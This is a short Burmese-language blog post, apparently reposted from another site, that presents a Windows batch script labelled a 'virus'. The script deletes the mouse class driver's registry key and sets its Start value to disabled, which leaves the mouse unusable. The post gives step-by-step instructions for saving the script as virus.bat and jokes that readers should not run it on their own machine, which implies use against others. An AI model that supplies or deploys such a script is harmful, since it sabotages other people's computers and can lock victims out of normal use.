Saturday, August 10, 2013

ေမာက္စ္ကုိ လႈပ္ရွားလုိ႔ မရေတာ့တဲ့ အေျခအေန Disable ျဖစ္သြားေအာင္ ျပဳလုပ္ေပးမယ့္ batch code
ေလး ျဖစ္ပါတယ္။ Notepad ကုိဖြင့္လုိက္ပါ။ ေအာက္ပါကုဒ္ေလးေတြကုိ ကူးၿပီး ထည့္ေပးလုိက္ပါ။

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


ၿပီးရင္ virus.bat ဆုိတဲ့ နာမည္နဲ႔ Save ပါမယ္။ Save as Type ဆုိတဲ့ ေနရာမွာ All Files ကိုေရြး
ေပးထားရပါမယ္။ 

ကဲ!  Virus တစ္ခုကုိ ဖန္တီးၿပီးသြားၿပီေနာ္၊ ကုိယ့္စက္မွာ သြား မ run နဲ႔ဦး၊ ေိခိ ! :D 


Credit:http://www.itfieldnet.com/2013/08/mouse-disable-virus.html

No comments:

Post a Comment